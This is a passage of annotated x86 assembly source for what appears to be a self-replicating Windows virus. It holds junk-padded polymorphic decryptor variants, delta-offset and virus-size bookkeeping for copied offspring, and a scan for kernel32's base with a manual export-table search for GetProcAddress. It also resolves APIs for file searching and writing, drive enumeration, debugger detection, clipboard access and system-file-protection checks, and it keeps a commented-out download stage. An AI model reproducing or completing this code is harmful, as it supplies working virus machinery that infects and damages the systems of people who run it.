xor dword ptr [esi],eax
db 0ffh
mov edx,eax
mov eax,edx
xor dword ptr [esi],eax
db 0ffh
xchg dword ptr [esi],eax ; key into memory, data into eax
xor eax,dword ptr [esi] ; eax = data ^ key
xchg dword ptr [esi],eax ; store it, key back in eax
db 0ffh
ror dword ptr[esi],32 ; count masked to 0: no-op
xor dword ptr [esi],eax
db 0ffh
push esi
pop edx
xor dword ptr [edx],eax
db 0ffh
inc edx ; junk (edx is not used)
xor dword ptr [esi],eax
db 0ffh
part_2: ; esi += 4
add esi,3
inc esi
db 0ffh
mov edx,esi
add edx,4
push edx
pop esi
db 0ffh
add esi,4
db 0ffh
push esi
add esi,2 ; discarded by the pop
pop esi
add esi,4 ; :P
db 0ffh
ror esi,32 ; no-op
add esi,4
db 0ffh
ror esi,16
rol esi,16 ; cancels the ror
add esi,4
db 0ffh
part_3: ; ecx += 4
mov ebx,3
add ecx,ebx
inc ecx
db 0ffh
ror ecx,32 ; no-op
add ecx,4
db 0ffh
add ecx,4
db 0ffh
inc ecx
inc ecx
add ecx,2
db 0ffh
add ecx,3
inc ecx
db 0ffh
rol ecx,32 ; no-op
add ecx,3
inc ecx
db 0ffh
part_4: ; cmp ecx, vir_size-_sub (must leave CF for the jnae at __enc)
cmp ecx,vir_size- _sub
db 0ffh
push ecx
pop ebx
cmp ebx,vir_size- _sub
db 0ffh
mov edx,ecx
cmp edx,vir_size- _sub
db 0ffh
mov ebx,ecx
push ebx
pop edx
cmp edx,vir_size-_sub
db 0ffh
mov edx,ecx
push edx
pop ebx
cmp ebx,vir_size-_sub
db 0ffh
mov edx,ecx
xchg ecx,edx ; swaps equal values: ecx unchanged
cmp edx,vir_size-_sub
db 0ffh
find_other_apis: ; resolve every API in the tables below by name. dll_base = module handle to resolve from; each table walk ends at the address table's 0ffh sentinel. Any failure jumps straight to `exit` without unwinding the stack
jmp fo_code
dll_base dd 0 ; module handle passed to GetProcAddress by l00p_apis
advapi32N db "advapi32.dll",0 ; not referenced in this listing
advapi32A dd 0 ; not referenced
user32N db "user32.dll",0
user32A dd 0 ; not referenced
shell32N db "shell32.dll",0
shell32A dd 0 ; not referenced
urlmonN db "urlmon.dll",0 ; only used by the commented-out download code below
sfcN db "sfc.dll",0
sfcA dd 0 ; not referenced
apis_name: ; kernel32 exports, one per slot of apis_address (same order)
CreateFileF db "CreateFileA",0
CloseHandleF db "CloseHandle",0
WriteFileF db "WriteFile",0
ReadFileF db "ReadFile",0
GetFileSizeF db "GetFileSize",0
GlobalAllocF db "GlobalAlloc",0
SetFilePointerF db "SetFilePointer",0
GetVersionExF db "GetVersionExA",0 ; resolved but not called in this listing
GetDateFormatF db "GetDateFormatA",0
SleepF db "Sleep",0
FindFirstFileF db "FindFirstFileA",0
FindNextFileF db "FindNextFileA",0
FindCloseF db "FindClose",0
GetLastErrorF db "GetLastError",0
ExitProcessF db "ExitProcess",0 ; resolved but not called in this listing
LoadLibraryF db "LoadLibraryA",0
FreeLibraryF db "FreeLibrary",0 ; resolved but not called in this listing
GetEnvironmentVariableF db "ExpandEnvironmentStringsA",0 ; resolved but not called in this listing (label name does not match the export)
GetModuleFileNameF db "GetModuleFileNameA",0
CopyFileF db "CopyFileA",0
GetCurrentDirectoryF db "GetCurrentDirectoryA",0
SetCurrentDirectoryF db "SetCurrentDirectoryA",0
GetFileAttributesF db "GetFileAttributesA",0
GetTickCountF db "GetTickCount",0
CreateThreadF db "CreateThread",0
IsDebuggerPresentF db "IsDebuggerPresent",0
CreateMutexF db "CreateMutexA",0
GetLogicalDriveStringsF db "GetLogicalDriveStringsA",0
GetDriveTypeF db "GetDriveTypeA",0
dd 0ffh ; end of the name table; not consulted -- the walk stops on the address table's sentinel
apis_address: ; filled by l00p_apis; in offspring these slots carry the parent's resolved values until re-resolved at startup
ACreateFileF dd 0
ACloseHandleF dd 0
AWriteFileF dd 0
AReadFileF dd 0
AGetFileSizeF dd 0
AGlobalAllocF dd 0
ASetFilePointerF dd 0
AGetVersionExF dd 0
AGetDateFormatF dd 0
ASleepF dd 0
AFindFirstFileF dd 0
AFindNextFileF dd 0
AFindCloseF dd 0
AGetLastErrorF dd 0
AExitProcessF dd 0
ALoadLibraryF dd 0
AFreeLibraryF dd 0
AGetEnvironmentVariableF dd 0
AGetModuleFileNameF dd 0
ACopyFileF dd 0
AGetCurrentDirectoryF dd 0
ASetCurrentDirectoryF dd 0
AGetFileAttributesF dd 0
AGetTickCountF dd 0
ACreateThreadF dd 0
AIsDebuggerPresentF dd 0
ACreateMutexF dd 0
AGetLogicalDriveStringsF dd 0
AGetDriveTypeF dd 0
dd 0ffh ; sentinel tested by l00p_apis
;urlmon_api:
;URLDowanloadToFileF db "URLDownloadToFileA",0
;urlmon_addresses:
;AURLDowanloadToFileF dd 0
;dd 0ffh
sfc_api:
SfcIsFileProtectedF db "SfcIsFileProtected",0
sfc_addresses:
ASfcIsFileProtectedF dd 0
dd 0ffh ; sentinel
shell32_api:
DragQueryFileF db "DragQueryFileA",0
shell32_addresses:
ADragQueryFileF dd 0
dd 0ffh ; sentinel
user32_api:
OpenClipboardF db "OpenClipboard",0
CloseClipboardF db "CloseClipboard",0
GetClipboardDataF db "GetClipboardData",0
MessageBoxF db "MessageBoxA",0
user32_addresses:
AOpenClipboardF dd 0
ACloseClipboardF dd 0
AGetClipboardDataF dd 0
AMessageBoxF dd 0
dd 0ffh ; sentinel
fo_code:
mov esi,offset apis_name
mov edi,offset apis_address
add esi,ebp
add edi,ebp
push [ebp+offset kernel_base]
pop [ebp+offset dll_base] ; kernel32 first (base found by get_kernel)
call l00p_apis
;mov eax,offset urlmonN
;add eax,ebp
;push eax
;call [eb+offset ALoadLibraryF]
;or eax,eax
;jz exit
;mov [ebp+offset dll_base],eax
;mov esi,offset urlmon_api
;mov edi,offset urlmon_addresses
;add esi,ebp
;add edi,ebp
;call l00p_apis
mov eax,offset user32N
add eax,ebp
push eax
call [ebp+offset ALoadLibraryF] ; LoadLibraryA("user32.dll")
or eax,eax
jz exit ; leaves this subroutine's return address on the stack
mov [ebp+offset dll_base],eax
mov esi,offset user32_api
mov edi,offset user32_addresses
add esi,ebp
add edi,ebp
call l00p_apis
mov eax,offset shell32N
add eax,ebp
push eax
call [ebp+offset ALoadLibraryF] ; LoadLibraryA("shell32.dll")
or eax,eax
jz exit
mov [ebp+offset dll_base],eax
mov esi,offset shell32_api
mov edi,offset shell32_addresses
add esi,ebp
add edi,ebp
call l00p_apis
mov eax,offset sfcN
add eax,ebp
push eax
call [ebp+offset ALoadLibraryF] ; LoadLibraryA("sfc.dll")
or eax,eax
jz exit
mov [ebp+offset dll_base],eax
mov esi,offset sfc_api
mov edi,offset sfc_addresses
add esi,ebp
add edi,ebp
call l00p_apis
ret
l00p_apis: ; In: esi -> NUL-terminated names, edi -> matching address slots, dll_base. Resolves until the slot after the current one holds the 0ffh sentinel
mov eax,esi
push eax
push [ebp+offset dll_base]
call dword ptr[ebp+offset AGetProcAddressF]
or eax,eax
jz exit ; unresolved name: jumps to exit from two call levels deep
mov dword ptr [edi],eax
l00p_small: ; skip to the end of the current name
inc esi
cmp byte ptr[esi],0
jne l00p_small
next_api_name:
inc esi
add edi,4
cmp dword ptr [edi],0ffh
je finish_fo
jmp l00p_apis
finish_fo:
ret
;///////////////////getting kernel base/////////////
get_kernel: ; find kernel32's load address by scanning downward, byte by byte, from the address the process entry point will return to (assumed to be inside kernel32). Out: kernel_base. Clobbers ecx, edx
jmp this_code
kernel_base dd 0
this_code:
mov ecx,[esp+4] ; [esp] = our return address; [esp+4] = the return address the loader pushed when it called the entry point
loop_find_kernel:
xor edx,edx
dec ecx ; NOTE: byte-granular scan; each [ecx+3ch] read may touch unmapped memory, and no SEH frame exists yet when this runs
mov dx,[ecx+3ch] ; candidate e_lfanew
test dx,0f800h ; require e_lfanew < 800h
jnz loop_find_kernel
cmp ecx,[ecx+edx+34h] ; OptionalHeader.ImageBase must equal the candidate base: only matches an image loaded at its preferred base, not a relocated/ASLR'd one
jnz loop_find_kernel
cmp word ptr [ecx],"ZM"
jne loop_find_kernel
mov [ebp+offset kernel_base],ecx
lrrt: ; unused label
ret
;/////////////////end getting kernel base///////////////
find_main_api: ; locate GetProcAddress in kernel32's export table by name. In: kernel_base. Out: AGetProcAddressF. Clobbers eax,ecx,edx,esi,edi
jmp finder_data
PE_offset dd 0 ; -> kernel32 PE header
Export_address dd 0 ; export directory RVA
Export_size dd 0 ; export directory size (not used afterwards)
Current_kern dd 0 ; not referenced
function_no dd 0 ; NumberOfNames (not used as a loop bound: the name scan has no upper limit)
function_addr dd 0 ; -> AddressOfFunctions
function_ord dd 0 ; -> AddressOfNameOrdinals
function_name dd 0 ; -> AddressOfNames
base_ord dd 0 ; export Base + kernel_base (a meaningless sum; not referenced)
GetProcAddressF db "GetProcAddress",0
AGetProcAddressF dd 0 ; resolved address, used by l00p_apis
GetModuleHandleN db "GetModuleHandleA",0 ; not referenced
GetModuleHandleAd dd 0 ; not referenced
finder_data:
mov edi,[ebp+offset kernel_base]
add edi,[edi+3ch] ;just checking
cmp word ptr [edi],"EP"
jne exit ; leaves this subroutine's return address on the stack
mov dword ptr [ebp+offset PE_offset],edi
mov eax,[edi+78h] ;export table rva (DataDirectory[0].VirtualAddress)
push eax
mov eax,[edi+7ch] ;export table size
mov [ebp+offset Export_size],eax
pop eax
mov [ebp+offset Export_address],eax
add eax,[ebp+offset kernel_base] ; eax -> IMAGE_EXPORT_DIRECTORY
mov edx,[eax+16] ; Base
add edx,[ebp+offset kernel_base]
mov [ebp+offset base_ord],edx
mov edx,[eax+24] ;NumberOfNames
mov [ebp+offset function_no],edx
mov edx,[eax+28] ;AddressOfFunctions (RVA)
add edx,[ebp+offset kernel_base]
mov [ebp+offset function_addr],edx
mov edx,[eax+32] ;AddressOfNames (RVA)
add edx,[ebp+offset kernel_base]
mov [ebp+offset function_name],edx
mov edx,[eax+36] ;AddressOfNameOrdinals (RVA)
add edx,[ebp+offset kernel_base]
mov [ebp+offset function_ord],edx
xor edx,edx
xor eax,eax
mov eax,[ebp+offset function_name] ; eax -> current name-RVA slot
mov edx,offset GetProcAddressF
add edx,ebp ; edx -> "GetProcAddress"
xor ecx,ecx ; ecx = name index
mov edi,[eax]
add edi,[ebp+offset kernel_base] ; edi -> current export name
loop_search_1:
mov esi,edx
match_byte:
cmpsb ; compare one byte of pattern vs export name, advancing both
jne Next_one
cmp byte ptr [edi],0 ; export name ended right after a matching byte -> accept (the pattern's own end is not checked, so an export that is a proper prefix of the pattern would also match)
je Got_it
jmp match_byte
Next_one:
add cx,1
add eax,4
mov edi,[eax]
add edi,[ebp+offset kernel_base] ; no bound against function_no: if the name were absent the scan would run past the table
jmp loop_search_1
jmp exit ; unreachable
Got_it:
mov edi,[eax]
add edi,[ebp+offset kernel_base] ; redundant reload
shl ecx,1 ; name ordinals are WORDs
mov eax,[ebp+offset function_ord]
add eax,ecx
xor ecx,ecx
mov cx,word ptr [eax] ; ordinal = index into AddressOfFunctions
shl ecx,2
mov eax,[ebp+offset function_addr]
add eax,ecx
mov eax,[eax] ; function RVA
add eax,[ebp+offset kernel_base]
mov [ebp+offset AGetProcAddressF],eax
ret
exit_finder: ; not referenced
mov eax,0
ret
end__: ; end of the copied body (vir_size = end__ - start)
end start ;end of story!